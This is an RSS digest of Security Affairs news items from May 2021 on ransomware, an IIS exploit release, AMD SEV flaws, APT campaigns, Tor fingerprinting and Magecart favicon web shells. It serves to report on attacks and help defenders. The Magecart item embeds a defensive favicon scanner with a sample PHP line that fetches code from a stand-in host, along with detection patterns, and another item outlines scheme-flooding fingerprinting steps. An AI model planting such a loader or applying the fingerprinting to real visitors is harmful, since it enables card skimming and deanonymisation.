RSS Security

Today — 17 May 2021, Security Affairs

Expert released PoC exploit code for Windows CVE-2021-31166 bug

17 May 2021 at 13:45

A security researcher has published a working proof-of-concept exploit code for a wormable Windows IIS server vulnerability tracked as CVE-2021-31166.

Microsoft Patch Tuesday for May 2021 security updates addressed 55 vulnerabilities in Microsoft products, including a critical HTTP Protocol Stack Remote Code Execution vulnerability tracked as CVE-2021-31166. The flaw could be exploited by an unauthenticated attacker by sending a specially crafted packet to a targeted server that uses the HTTP Protocol Stack (http.sys) to process packets.

This stack is used by the Windows built-in IIS server, which means that it could be easily exploited if the server is enabled. The flaw is wormable and affects different versions of Windows 10, Windows Server 2004 and Windows Server 20H2.

Over the weekend, the security researcher Axel Souchet published proof-of-concept exploit code for the wormable flaw that impacts Windows IIS.

The PoC exploit code crashes an unpatched Windows system running an IIS server; it does not implement worming capabilities.

Still, attackers could start triggering the vulnerability in the wild, and the PoC code could be improved to achieve active exploitation.

I've built a PoC for CVE-2021-31166 the "HTTP Protocol Stack Remote Code Execution Vulnerability": https://t.co/8mqLCByvCp 🔥🔥 pic.twitter.com/yzgUs2CQO5

— Axel Souchet (@0vercl0k) May 16, 2021

The public availability of the PoC exploit code is another good reason to apply Microsoft Patch Tuesday for May 2021 security updates as soon as possible.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, RCE)


Bitcoin down: 51% attack? No, put the blame on Elon Musk

17 May 2021 at 09:02

The price of Bitcoin falls after Elon Musk declared that his company, Tesla, may have sold its holdings of the cryptocurrency.

We have long debated the possibility that the Bitcoin price could be influenced by threat actors through 51% attacks, but recent events demonstrate that it could be much easier to manipulate its value.

A simple Tweet from an influencer could cause the fall of the price of a cryptocurrency, opening the door for any type of financial speculation.

Do you trust a cryptocurrency system that is influenced by the declaration of a single individual?

Tesla CEO Elon Musk published a tweet on Sunday confirming that his company sold or is going to sell the rest of its bitcoin holdings, and the news had a dramatic impact on the Bitcoin value.

[Image: bitcoin falls]

Bitcoiners are going to slap themselves next quarter when they find out Tesla dumped the rest of their #Bitcoin holdings.

With the amount of hate @elonmusk is getting, I wouldn’t blame him…

— Mr. Whale (@CryptoWhale) May 16, 2021

Bitcoin’s price plummeted after Musk’s posts and has yet to recover; this implies that the price of the most popular cryptocurrency depends on the account of a single man. Anyone able to hack his account could make a lot of money by influencing the prices of cryptocurrencies.

Media pointed out that the alleged sale comes just days after Musk declared that Tesla planned to hold rather than sell the Bitcoin it already has.

“A potential sale comes just days after Musk said the company planned to hold rather than sell the bitcoin it already has and intended to use it for transactions as soon as mining transitions to more sustainable energy. Tesla did not immediately respond to a request for comment.” reported CNBC.

Tesla representatives have yet to provide any comment on the event.

In an SEC filing in February, Tesla announced that it had bought $1.5 billion worth of bitcoin, and it later earned $101 million from sales of bitcoin during the quarter.

Even though Musk has always supported cryptocurrencies, last week his company “suspended vehicle purchases using bitcoin.” The move was the result of concern over the “rapidly increasing use of fossil fuels for bitcoin mining,” and in that case too it had an impact on the price of bitcoin, which dropped about 5% in the first minutes after the announcement.

Musk also influenced the price of another cryptocurrency, dogecoin, with the announcement that SpaceX would accept dogecoin as payment to launch “DOGE-1 mission to the Moon.” The announcement pumped up the price of the coin.

Is this really good for cryptocurrencies? Or are we facing a real new threat to their credibility?

What will be the reason for the next bubble? I focus on sustainability and respect for the environment for cryptocurrencies.


Pierluigi Paganini

(SecurityAffairs – hacking, Musk)


Conti ransomware demanded $20M ransom to Ireland Health Service Executive

17 May 2021 at 06:19

Ireland Health Service Executive (HSE) refuses to pay a $20 million ransom demand after its systems were hit by the Conti ransomware gang.

Ireland’s Health Service Executive was forced to shut down its IT systems on Friday after being targeted with a significant ransomware attack. The Health Service Executive opted to shut down its infrastructure as a precaution to avoid the threat spreading.

The authorities launched an investigation into the incident, which began at around 4.30am on Friday; government experts are working to determine the extent of the security breach.

The incident caused cancellations and disruption to services at multiple hospitals in the country; fortunately, the ongoing coronavirus vaccination campaign was not affected.

“There is a significant ransomware attack on the HSE IT systems. We have taken the precaution of shutting down all our IT systems in order to protect them from this attack and to allow us fully assess the situation with our own security partners,” reads a statement published by the HSE. “Vaccination appointments are going ahead as normal.”

“We’ve taken a precautionary measure to shut down a lot of our major systems to protect them,” chief executive Paul Reid told broadcaster RTE. “We are at the very early stages of fully understanding the threats, the impact and trying to contain it.”

New details about the attack have now been reported by the media: the HSE shut down all of its IT systems due to a Conti ransomware attack.

Researchers from BleepingComputer revealed that the Conti ransomware gang demanded a $20 million ransom.

“Yesterday, a cybersecurity researcher shared a screenshot of a chat between Conti and Ireland’s HSE with BleepingComputer.” reported BleepingComputer. “Conti further stated that they would provide a decryptor and delete the stolen data if a ransom of $19,999,000 is paid to the threat actors.”

The Conti ransomware gang claims to have stolen 700 GB of sensitive data from the HSE over two weeks. Stolen info includes patient documents, contracts, financial statements, and payroll.

Taoiseach Micheál Martin, the Prime Minister of Ireland, confirmed in a press release that they will not pay the ransom.

Conti ransomware operators run a private Ransomware-as-a-Service (RaaS); the malware appeared in the threat landscape at the end of December 2019 and was distributed through TrickBot infections. Experts speculate the operators are members of a Russia-based cybercrime group known as Wizard Spider.

Since August 2020, the group has run a leak site used to threaten victims with the release of the stolen data.

The list of victims of the group includes IoT chip maker Advantech and Broward County Public Schools (BCPS).


Pierluigi Paganini

(SecurityAffairs – hacking, Health Service Executive)


Yesterday — 16 May 2021, Security Affairs

Avaddon Ransomware gang hacked France-based Acer Finance and AXA Asia

16 May 2021 at 17:44

Avaddon ransomware gang has breached the France-based financial consultancy firm Acer Finance.

The Avaddon ransomware gang has made the headlines again; the cybercrime gang has breached the France-based financial consultancy firm Acer Finance.

Acer Finance operates as an investment management company. The Company offers risk management, mutual funds, analysis, financial planning, and advisory services. Acer Finance serves individuals, entrepreneurs, and institutional investors in France.

The Avaddon ransomware gang is giving Acer Finance 240 hours to communicate and cooperate with them before it starts leaking the stolen company documents.

[Image: Avaddon Acer Finance leak-site post]

The ransomware gang claims to have stolen confidential company information about clients and employees.

“You can congratulate us on the successful attack on the company, we also have about a lot of confidential information of clients, a lot of confidential information of employees, banking, personal correspondence, contracts, agreements, forms of payment, a lot of data from the secretariat, licenses and much more.” reads the statement published by the group on its leak site.

The hackers pointed out that there is no way to decrypt the data without their decryptor, and they also threatened to target the company with a DDoS attack if it refuses to pay the ransom.

As proof of the hack, the group published several ID cards, personal documents, contracts, and a screenshot of the folders containing the stolen data.

[Image: Avaddon Acer Finance proof of hack]

The group also announced that it has hacked the Asian branch of AXA and stolen three terabytes of data.

Curiously, AXA recently announced that in France it will no longer reimburse ransomware payments made by its customers. The decision is the result of the increased number of ransomware attacks and the large ransoms demanded by cybercriminals.

Last week, the Federal Bureau of Investigation (FBI) and the Australian Cyber Security Centre (ACSC) warned of an ongoing Avaddon ransomware campaign targeting organizations worldwide in multiple industries, including government, finance, energy, manufacturing, and healthcare.

The alert published by the ACSC provides a list of countries under attack, which includes the US, UK, Germany, France, China, Italy, Brazil, India, UAE, and Spain.


Pierluigi Paganini

(SecurityAffairs – hacking, Avaddon)


Two flaws could allow bypassing AMD SEV protection system

16 May 2021 at 15:35

The chipmaker AMD published guidance for two new attacks against its SEV (Secure Encrypted Virtualization) protection technology.

Chipmaker AMD has issued guidance for two attacks (CVE-2020-12967, CVE-2021-26311) that allow bypassing the SEV (Secure Encrypted Virtualization) technology implemented to prevent rogue operating systems on virtual machines.

The chipmaker is aware of two research papers, respectively titled “SEVerity: Code Injection Attacks against Encrypted Virtual Machines” and “undeSErVed trust: Exploiting Permutation-Agnostic Remote Attestation,” related to the two attacks above. The findings about the two attacks will be presented by two research teams at this year’s 15th IEEE Workshop on Offensive Technologies (WOOT’21).

AMD Secure Encrypted Virtualization (SEV) isolates virtual machines and the hypervisor, but the two attacks can allow threat actors to inject arbitrary code into the virtual machine even if the protection mechanism is in place.

The first flaw, tracked as CVE-2020-12967, is caused by the lack of nested page table protection in the AMD SEV/SEV-ES feature which could potentially lead to arbitrary code execution within the guest VM if a malicious administrator has access to compromise the server hypervisor.

The second vulnerability, tracked as CVE-2021-26311, also resides in the AMD SEV/SEV-ES feature. According to the security advisory, memory can be rearranged in the guest address space in a way that is not detected by the attestation mechanism, which a malicious hypervisor could use to potentially achieve arbitrary code execution within the guest VM if a malicious administrator has access to compromise the server hypervisor.

The vulnerabilities impact all AMD EPYC processors, 1st/2nd/3rd Gen AMD EPYC™ Processors and AMD EPYC™ Embedded Processors.

The vendor has provided mitigation in the SEV-SNP feature, which is available for enablement in 3rd Gen AMD EPYC™ processors. Customers could mitigate the attacks by enabling SEV-SNP, which is only supported on 3rd Gen AMD EPYC™.

Customers using prior generations of EPYC processors, which do not support SEV-SNP, should follow security best practices.

The vendor published the following acknowledgement:

  • CVE-2020-12967:  Mathias Morbitzer, Martin Radev and Erick Quintanar Salas from Fraunhofer AISEC and Sergej Proskurin and Marko Dorfhuber from Technical University of Munich
  • CVE-2021-26311: Luca Wilke, Jan Wichelmann, Florian Sieck and Thomas Eisenbarth from University of Lübeck


Pierluigi Paganini

(SecurityAffairs – hacking, AMD)


MSBuild tool used to deliver RATs filelessly

16 May 2021 at 11:31

Hackers abuse the Microsoft Build Engine (MSBuild) to filelessly deliver malware on targeted Windows systems, including RATs and a password stealer.

Researchers from Anomali observed threat actors abusing Microsoft Build Engine (MSBuild) to filelessly deliver remote access trojans and RedLine Stealer password-stealing malware on targeted Windows systems.

“Anomali Threat Research discovered a campaign in which threat actors used MSBuild – a tool used for building apps and gives users an XML schema “that controls how the build platform processes and builds software” – to filelessly deliver RemcosRAT, and RedLine stealer using callbacks.” reads a report published by Anomali.

The campaign began in April 2021 and is still ongoing; experts pointed out that it has low or zero detections.

MSBuild is a free and open-source build toolset for managed code as well as native C++ code, and it was part of the .NET Framework. It is used for building apps and gives users an XML schema “that controls how the build platform processes and builds software.”

The MSBuild files employed in the attacks spotted by the experts contained encoded executables and shellcode, some of which were hosted on the Russian image-hosting site joxi[.]net. At the time of this writing, the way the .proj files were distributed has yet to be discovered; in any case, the files were used by attackers to execute Remcos or RedLine Stealer.

[Image: MSBuild infection chain]

The use of MSBuild allows the attackers to avoid detection while loading the malicious code into memory.

Most of the samples analyzed by Anomali were used to deliver the Remcos RAT, while others were also delivering the Quasar RAT and RedLine Stealer.

Remcos is commercial software that can be used for remote control, remote administration, remote anti-theft, remote support and pentesting. The Quasar RAT is available for free on GitHub; many other attackers have used it in their campaigns, including the Gaza Cybergang, which is also known as Gaza Hackers Team and Molerats.

“The threat actors behind this campaign used fileless delivery as a way to bypass security measures, and this technique is used by actors for a variety of objectives and motivations,” concludes Anomali. “This campaign highlights that reliance on antivirus software alone is insufficient for cyber defense, and the use of legitimate code to hide malware from antivirus technology is effective and growing exponentially.”


Pierluigi Paganini

(SecurityAffairs – hacking, MSBuild)


Security Affairs newsletter Round 314

16 May 2021 at 09:51

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

CISA MAR report provides technical details of FiveHands Ransomware
SQL injection issue in Anti-Spam WordPress Plugin exposes User Data
TsuNAME flaw exposes DNS servers to DDoS attacks
City of Tulsa, is the last US city hit by ransomware attack
City of Tulsa, is the latest US city hit by ransomware attack
FBI confirmed that Darkside ransomware gang hit Colonial Pipeline
Threat actors added thousands of Tor exit nodes to carry out SSL stripping attacks
WhatsApp will not deactivate accounts for not accepting new privacy terms
Apple was aware that XcodeGhost impacted 128 Million iOS Users in 2015
FBI and Australia ACSC agencies warn of ongoing Avaddon ransomware attacks
Google open sources cosign tool for verifying containers
Hackers target Windows users exploiting a Zero-Day in Reader
Researcher hacked Apple AirTag two weeks after its launch
FragAttacks vulnerabilities expose all WiFi devices to hack
How Companies Need to Treat User Data and Manage Their Partners
Maybe dont call Saul? Over 30,000 VoIP devices identifiable worldwide, some with suspected vulnerabilities
Microsoft Patch Tuesday for May 2021 fix 4 critical flaws
NSA and ODNI analyze potential risks to 5G networks
TeaBot Android banking Trojan targets banks in Europe
Biden signed executive order to improve the Nation’s Cybersecurity
Cisco fixes AnyConnect Client VPN zero-day disclosed in November
Security at Bay: Critical Infrastructure Under Attack
US CISA and FBI publish joint alert on DarkSide ransomware
Colonial Pipeline likely paid a $5M ransom to DarkSide
Darkside gang lost control of their servers and funds
Ireland’s Health Service Executive hit by ransomware attack
Magecart gang hides PHP-based web shells in favicons
Rapid7 says source code, credentials accessed as a result of Codecov supply-chain attack
Scheme flooding fingerprint technique may deanonymize Tor users

If you also want to receive the International Press, subscribe for free to the Security Affairs newsletter here.


Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)


Pakistan-linked Transparent Tribe APT expands its arsenal

16 May 2021 at 08:39

An alleged Pakistan-linked cyber espionage group, tracked as Transparent Tribe, targets Indian entities with a new Windows malware.

Researchers from Cisco Talos warn that the Pakistan-linked APT group Transparent Tribe expanded its Windows malware arsenal. The group used the new malware dubbed ObliqueRAT in cyberespionage attacks against Indian targets.

Operation Transparent Tribe (also tracked as Operation C-Major, APT36, and Mythic Leopard) was first spotted by Proofpoint researchers in February 2016, in a series of cyber espionage operations against Indian diplomats and military personnel at embassies in Saudi Arabia and Kazakhstan. At that time, the researchers traced the source IPs to Pakistan; the attacks were part of a wider operation that relied on multiple vectors, such as watering hole websites and phishing email campaigns, to deliver custom RATs dubbed Crimson and Peppy. These RATs are capable of exfiltrating information, taking screenshots, and recording webcam streams.

Transparent Tribe has been active since at least 2013; it has targeted entities across 27 countries, most of them in Afghanistan, Germany, India, Iran, and Pakistan.

In the recent wave of attacks, threat actors employed domains mimicking legitimate Indian military and defense organizations, and other domains posing as content-hosting sites that were used to host malicious artifacts.

“Transparent Tribe, also known as APT36 and Mythic Leopard, continues to create fake domains mimicking legitimate military and defense organizations as a core component of their operations. Cisco Talos’ previous research has mainly linked this group to CrimsonRAT, but new campaigns show they are expanding their Windows malware arsenal with ObliqueRAT.” reads the analysis published by Cisco Talos. “While military and defense personnel continue to be the group’s primary targets, Transparent Tribe is increasingly targeting diplomatic entities, defense contractors, research organizations and conference attendees, indicating that the group is expanding its targeting.”

These domains were used to distribute weaponized documents that deliver CrimsonRAT and ObliqueRAT. Experts observed the hackers using resume documents and archives, such as ZIPs and RARs, with alluring themes to distribute CrimsonRAT.

Email and maldoc lures employed to deliver the malware used multiple themes, including conference agendas, honeytrap lures and diplomatic themes.

“The actors recently deviated from the CrimsonRAT infection chains to make their ObliqueRAT phishing maldocs appear more legitimate. For example, attackers leveraging ObliqueRAT started hosting their malicious payloads on compromised websites instead of embedding the malware in the maldoc.” continues the report. “In one such case in early 2021, the adversaries used iiaonline[.]in, the Indian Industries Association’s legitimate website, to host ObliqueRAT artifacts.”

[Image: Transparent Tribe]

In other attacks, the group used fake domains for the 7th Central Pay Commission (7CPC) of India and an Indian think tank called the Center For Land Warfare Studies (CLAWS).

“Transparent Tribe relies heavily on the use of maldocs to spread their Windows implants,” the researchers said. “While CrimsonRAT remains the group’s staple Windows implant, their development and distribution of ObliqueRAT in early 2020 indicates they are rapidly expanding their Windows malware arsenal.”

Experts noticed that Transparent Tribe’s TTPs have remained largely unchanged since 2020, but the cyberspies continue to add new lures to their arsenal.

Talos researchers also published the Indicators of Compromise (IoCs) for the new attacks.


Pierluigi Paganini

(SecurityAffairs – hacking, APT)


Before yesterday, Security Affairs

European police dismantle major online investment fraud ring that causes €30 Million in losses

15 May 2021 at 16:41

A joint operation of European law enforcement agencies coordinated by Europol dismantled a criminal ring involved in investment fraud.

A joint investigation of European law enforcement agencies supported by Europol and Eurojust dismantled a large criminal network involved in investment fraud and money laundering. The operation, led by Germany, involved authorities from Bulgaria, Israel, Latvia, North-Macedonia, Poland, Spain, and Sweden.

The crime ring caused losses of approximately €30 million (US$36 million) to hundreds of victims, with at least €7 million in losses in Germany alone.

The authorities arrested 11 people (5 in Bulgaria, 1 in Israel, and 5 in Spain) and searched dozens of locations in Bulgaria, Israel, Poland, North Macedonia and Sweden. The agents seized numerous electronic devices, real estate, jewellery, high-end vehicles, and approximately €2 million in cash; authorities also froze multiple bank accounts controlled or owned by shell companies based in different EU countries that were used to launder the illegal profits.

The crooks set up at least four online trading platforms that offered significant profits from investments in cryptocurrencies and high-risk options to potential investors. The crime ring published ads for the trading platforms on various social media platforms and search engines.

“The criminal network created different trading online platforms advertising substantial profits from investments in high-risk options and cryptocurrencies. The criminal group ran at least four of such professionally looking trading platforms, luring victims through advertisements in social media and search engines.” reads the press release published by Europol. “The members of the criminal group were posing as experienced brokers when contacting the victims via the call centre they had set-up. The suspects were using manipulated software to show the gains from the investments and to motivate the victims to invest even more.”

According to the press release, 300 complaints were filed in Spain.


Pierluigi Paganini

(SecurityAffairs – hacking, PLA Unit 61419)


Major hacking forums XSS and Exploit ban ads from ransomware gangs

15 May 2021 at 12:31

XSS forum (previously known as DaMaGeLab), one of the most popular hacking forums, announced that it would ban the ads published by ransomware gangs.

The popular hacking forum XSS, previously known as DaMaGeLab, announced that it would ban the ads published by ransomware gangs. The forum is one of the most important gathering places where ransomware gangs offer their services and attempt to recruit new affiliates into their networks.

The decision to ban ads published by ransomware gangs was an attempt to avoid attracting attention from law enforcement; the forum also prohibits any affiliate program. The recent ransomware attack against Colonial Pipeline conducted by the Darkside gang triggered a response by the US authorities that resulted in the seizure of the gang’s servers.

At the time of this writing, ads from ransomware gangs are still allowed on some hacking forums, but another popular cybercrime forum, Exploit, banned this activity.

Admins of Exploit will also remove affiliate programs from the hacking forum:

“We are glad to see pentesters, malware specialists, coders, but we are not happy with lockers – they attract a lot of attention. This type of activity is not good to us in view of the fact that networks are locked indiscriminately we do not consider it appropriate for RaaS partner programs to be present on our forum. It was decided to remove all affiliate programs and prohibit them as a type of activity on our forum.” reads the statement published by the admins.

Another one bites the dust – forum Exploit bans #ransomware pic.twitter.com/d4nknItz7E

— 𝕯𝖒𝖎𝖙𝖗𝖞 𝕾𝖒𝖎𝖑𝖞𝖆𝖓𝖊𝖙𝖘 (@ddd1ms) May 14, 2021
[Image: ransomware ban. Source: Twitter]


Pierluigi Paganini

(SecurityAffairs – hacking, ransomware)


QNAP warns of eCh0raix ransomware and Roon Server zero-day attacks

15 May 2021 at 08:41

QNAP warns of an actively exploited Roon Server zero-day flaw and eCh0raix ransomware attacks on its NAS devices.

QNAP warns customers of threat actors that are targeting its Network Attached Storage (NAS) devices with eCh0raix ransomware attacks and exploiting a Roon Server zero-day vulnerability.

The Taiwanese vendor was informed of ongoing eCh0raix ransomware attacks that infected QNAP NAS devices protected by weak passwords.

“The eCh0raix ransomware has been reported to affect QNAP NAS devices. Devices using weak passwords may be susceptible to attack.” reads the advisory published by the vendor. “We strongly recommend users act immediately to protect their data.”

The company recommends that customers perform the following actions:

  1. Use stronger passwords for your administrator accounts.
  2. Enable IP Access Protection to protect accounts from brute force attacks.
  3. Avoid using default port numbers 443 and 8080.

Independent experts observed a surge in eCh0raix ransomware infection reports between April 19 and April 26.

In the same period, the vendor also warned its users of an ongoing AgeLocker ransomware outbreak.

Unfortunately, the bad news for NAS owners does not end there: the vendor also issued another security advisory to warn of an actively exploited zero-day vulnerability affecting Roon Labs’ Roon Server 2021-02-01 and earlier versions.

“The QNAP security team has detected an attack campaign in the wild related to a vulnerability in Roon Server. QNAP NAS running the following versions of Roon Server may be susceptible to attack: Roon Server 2021-02-01 and earlier.

“We have already notified Roon Labs of the issue and are thoroughly investigating the case. We will release security updates and provide further information as soon as possible,” reads the advisory.

QNAP recommends that users not expose their devices to the internet; it also recommends disabling Roon Server to prevent potential attacks.

Below are the instructions to disable Roon Server on NAS devices:

  • Log on to QTS as administrator. Open the App Center and then click the search icon.
  • A search box appears. Type “Roon Server” and then press ENTER.
  • Roon Server appears in the search results. Click the arrow below the Roon Server icon and select Stop.
  • The application is disabled.


Pierluigi Paganini

(SecurityAffairs – hacking, IoT)


Scheme flooding fingerprint technique may deanonymize Tor users

14 May 2021 at 22:19

FingerprintJS experts devised a fingerprinting technique, named scheme flooding, that could allow identifying users across different desktop browsers, including the Tor Browser.

FingerprintJS experts devised a new fingerprinting technique, named scheme flooding, that could allow identifying users while browsing websites using different desktop browsers, including the Tor Browser.

The technique allows profiling users while they visit websites with an ordinary browser, such as Safari, Chrome, or Firefox, and identifying their online activity even when they attempt to protect their anonymity using the Tor browser.

The scheme flooding technique leverages custom URL schemes to determine which applications users have installed.

“The vulnerability uses information about installed apps on your computer in order to assign you a permanent unique identifier even if you switch browsers, use incognito mode, or use a VPN.” reads the post published by FingerprintJS. “The scheme flooding vulnerability allows for third party tracking across different browsers and thus is a violation of privacy.”

The scheme flooding vulnerability could be exploited by an attacker to generate a 32-bit cross-browser device identifier by testing for the presence of a list of 32 popular applications on the visitor’s system.

Experts pointed out that analysis of the list of applications installed on your device can reveal your habits and other information, such as occupation and age.

The experts could check whether an application is installed using built-in custom URL scheme handlers; for example, by entering skype:// in the browser’s address bar it is possible to check whether Skype is installed.

The experts describe the following procedure:

  1. Prepare a list of application URL schemes that you want to test. The list may depend on your goals, for example, if you want to check if some industry or interest-specific applications are installed.
  2. Add a script on a website that will test each application from your list. The script will return an ordered array of boolean values. Each boolean value is true if the application is installed or false if it is not.
  3. Use this array to generate a permanent cross-browser identifier.
  4. Optionally, use machine learning algorithms to guess your website visitors’ occupation, interests, and age using installed application data.

Even though most browsers implement safety mechanisms to prevent such probing, a combination of CORS policies and browser window features can be used to bypass them.

The experts successfully tested the technique on Chrome 90 (Windows 10, macOS Big Sur), Firefox 88.0.1 (Ubuntu 20.04, Windows 10, macOS Big Sur), Safari 14.1 (macOS Big Sur), Tor Browser 10.0.16 (Ubuntu 20.04, Windows 10, macOS Big Sur), Brave 1.24.84 (Windows 10, macOS Big Sur), Yandex Browser 21.3.0 (Windows 10, macOS Big Sur), and Microsoft Edge 90 (Windows 10, macOS Big Sur). Opera was not tested.

“The exact steps to make the scheme flooding vulnerability possible may vary by browser, but the end result is the same. Getting a unique array of bits associated with a visitor’s identity is not only possible, but can be used on malicious websites in practice. Even Tor Browser can be effectively exploited by tricking a user into typing one character per application we want to test.” conclude the experts.

Pierluigi Paganini

(SecurityAffairs – hacking, PLA Unit 61419)

Darkside gang lost control of their servers and funds

14 May 2021 at 19:29

The operators of the Darkside ransomware announced that they have lost control of their infrastructure and part of the funds the gang obtained from the victims.

Darkside ransomware operators say they have lost control of their servers and of the funds resulting from their extortion activity; the funds were transferred to an unknown wallet.

“The funds, which the Darkside gang was supposed to split between itself and its affiliates (the threat actors who breach networks and deploy the ransomware), were transferred to an unknown wallet, Darksupp said.” reported TheRecord.

The news was revealed by a member of the REvil ransomware gang, known as ‘UNKN,’ in a post on the Exploit hacking forum. The post was first spotted by Recorded Future researcher Dmitry Smilyanets; it includes a message allegedly from DarkSide explaining how the gang lost access to its blog, payment servers, and DDoS servers as a result of a law enforcement action.


“Since the first version, we have promised to speak honestly and openly about problems. A few hours ago, we lost access to the public part of our infrastructure, namely:

  • Blog.
  • Payment server.
  • DOS servers.”

reads the post from UNKN. “Now these servers are unavailable via SSH, the hosting panels are blocked. Hosting support, apart from information “at the request of law enforcement agencies”, does not provide any other information.”

Researchers from security firm Intel471 revealed that on May 13, 2021, DarkSide operators announced they would immediately cease operations of their RaaS program. The ransomware gang also said it would issue decryptors to all its affiliates for their victims, and that it plans to settle all outstanding financial obligations by May 23, 2021.

Yesterday, President Biden said that the US government doesn’t believe the attack on the Colonial Pipeline was carried out by a Russia-linked threat actor; he pointed out that US authorities will go after the criminal gang responsible for the attack.

“We do not believe — I emphasize, we do not believe the Russian government was involved in this attack. But we do have strong reason to believe that criminals who did the attack are living in Russia. That’s where it came from — were from Russia.” said Biden.

“We have been in direct communication with Moscow about the imperative for responsible countries to take decisive action against these ransomware networks. We’re also going to pursue a measure to disrupt their ability to operate. And our Justice Department has launched a new task force dedicated to prosecuting ransomware hackers to the full extent of the law.”

At the same time, the leak site operated by the DarkSide gang was unavailable and media outlets speculated it had been seized by the feds, but BleepingComputer noticed that the Tor payment server used by the group was still up and running.

Other experts speculate that the gang opted for an exit scam, keeping for itself the ransoms paid by the victims of its affiliates.

Pierluigi Paganini

(SecurityAffairs – hacking, DarkSide)

Magecart gang hides PHP-based web shells in favicons

14 May 2021 at 14:08

The Magecart cybercrime gang is using favicons to hide malicious PHP web shells that maintain remote access and inject JavaScript skimmers into online stores.

Magecart hackers are distributing malicious PHP web shells hidden in website favicons to inject JavaScript e-skimmers into online stores and steal payment information.

Researchers from Malwarebytes observed threat actors, likely Magecart Group 12, using this technique in attacks aimed at online stores running Magento 1.

The web shells employed in the attacks are tracked as Smilodon or Megalodon; they dynamically load JavaScript skimming code into online stores via server-side requests. This technique allows bypassing most client-side security tools.

“While performing a crawl of Magento 1 websites, we detected a new piece of malware disguised as a favicon. The file named Magento.png attempts to pass itself as ‘image/png’ but does not have the proper PNG format for a valid image file.” reads the analysis published by Malwarebytes.

Magecart favicon web shells

Threat actors edited the shortcut icon tags with a path to the fake PNG file. Unlike previous incidents observed by the experts, in which fake favicons were used to hide malicious JavaScript code, in the latest wave of attacks the web shell is written in PHP.

In the latest attacks, the e-skimmer code is introduced into the online store dynamically, server-side.

The web shell retrieves the e-skimmer from a remote host; the code involved in this attack is similar to a variant used in the Cardbleed attacks documented by SanSec researchers in September.

The attribution of the attack to Magecart Group 12 is based on overlaps in the TTPs observed in the attacks. Experts also noticed that the domain name used in the attack (zolo[.]pw) is associated with the same IP address (217.12.204[.]185) as recaptcha-in[.]pw and google-statik[.]pw, domains previously associated with Magecart Group 12.
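A defender-side check for the disguise described above, added here as an example and not code from Malwarebytes or from the Magecart analysis: it pulls favicon references out of a page, verifies the file bytes against the declared image type, and flags PHP content. The indicator list, the sample page and the contents of the fake Magento.png are constructed for this example.

```python
import re

# Constructed for this example; the indicator list is illustrative,
# not Malwarebytes' detection logic.
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
ICO_SIGNATURE = b"\x00\x00\x01\x00"
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)
REMOTE_FETCH_CALLS = re.compile(
    rb"\b(file_get_contents|curl_exec|fsockopen|eval|base64_decode)\s*\(",
    re.IGNORECASE,
)
LINK_TAG = re.compile(r"<link\b[^>]*>", re.IGNORECASE)
LINK_ATTR = re.compile(r"""\b(rel|href|type)\s*=\s*["']([^"']*)["']""", re.IGNORECASE)


def favicon_links(html: str) -> list:
    """Return (href, declared MIME type) for every <link> whose rel mentions 'icon'.

    When the tag carries no type attribute, the type is inferred from the
    file extension, as a browser would.
    """
    links = []
    for tag in LINK_TAG.findall(html):
        attrs = {k.lower(): v for k, v in LINK_ATTR.findall(tag)}
        if "icon" in attrs.get("rel", "").lower() and "href" in attrs:
            href = attrs["href"]
            declared = attrs.get("type") or (
                "image/png" if href.lower().endswith(".png") else "image/x-icon")
            links.append((href, declared))
    return links


def classify_favicon(data: bytes, declared_type: str) -> dict:
    """Compare a favicon's bytes with its declared type and look for PHP code."""
    reasons = []
    mime = declared_type.lower()
    if mime == "image/png" and not data.startswith(PNG_SIGNATURE):
        reasons.append("declared image/png but PNG signature is missing")
    if mime in ("image/x-icon", "image/vnd.microsoft.icon") and not data.startswith(ICO_SIGNATURE):
        reasons.append("declared ICO but ICO header is missing")
    if PHP_OPEN_TAG.search(data):
        reasons.append("contains a PHP open tag")
    calls = sorted({m.decode().lower() for m in REMOTE_FETCH_CALLS.findall(data)})
    if calls:
        reasons.append("calls " + ", ".join(calls))
    return {"suspicious": bool(reasons), "reasons": reasons}


def scan_store(html: str, files: dict) -> dict:
    """Map each favicon path referenced in html to its verdict (files: path -> bytes)."""
    return {href: classify_favicon(files[href], declared)
            for href, declared in favicon_links(html) if href in files}


# Constructed sample input: a store page whose shortcut icon points at a
# fake Magento.png, plus a genuine PNG and the PHP file served under that name.
SAMPLE_HTML = """<head>
<link rel="stylesheet" href="/skin/frontend/base/default/css/styles.css">
<link rel="shortcut icon" href="/media/favicon/Magento.png" type="image/png">
</head>"""
# A genuine PNG starts with the 8-byte signature followed by an IHDR chunk.
REAL_PNG = PNG_SIGNATURE + b"\x00\x00\x00\x0dIHDR" + b"\x00" * 17
# PHP under a .png name that fetches code from a remote host (placeholder
# domain), mirroring the server-side loading described in the analysis.
FAKE_PNG = b"<?php echo file_get_contents('http://skimmer.invalid/loader'); ?>"


if __name__ == "__main__":
    for path, verdict in scan_store(SAMPLE_HTML, {"/media/favicon/Magento.png": FAKE_PNG}).items():
        print(path, verdict)
```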

“There are a number of ways to load skimming code but the most common one is by calling an external JavaScript resource. When a customer visits an online store, their browser will make a request to a domain hosting the skimmer. Although criminals will constantly expand on their infrastructure it is relatively easy to block these skimmers using a domain/IP database approach.” concludes the analysis.

“In comparison, the skimmer we showed in this blog dynamically injects code into the merchant site. The request to the malicious domain hosting the skimming code is not made client-side but server-side instead. As such a database blocking approach would not work here unless all compromised stores were blacklisted, which is a catch-22 situation. A more effective, but also more complex and prone to false positives approach, is to inspect the DOM in real time and detect when malicious code has been loaded.”

Pierluigi Paganini

(SecurityAffairs – hacking, Magecart)

Ireland’s Health Service Executive hit by ransomware attack

14 May 2021 at 11:30

Ireland’s Health Service Executive (HSE) shut down its IT systems after they were hit by a “significant ransomware attack.”

Another major ransomware attack made the headlines; this time the victim is Ireland’s Health Service Executive, which was forced to shut down its IT systems on Friday.

After being targeted by a significant ransomware attack, the HSE opted to shut down its infrastructure as a precaution to stop the threat from spreading. The good news is that the ongoing coronavirus vaccination campaign was not affected.

“There is a significant ransomware attack on the HSE IT systems. We have taken the precaution of shutting down all our IT systems in order to protect them from this attack and to allow us to fully assess the situation with our own security partners.” reads a statement published by the HSE. “Vaccination appointments are going ahead as normal.”

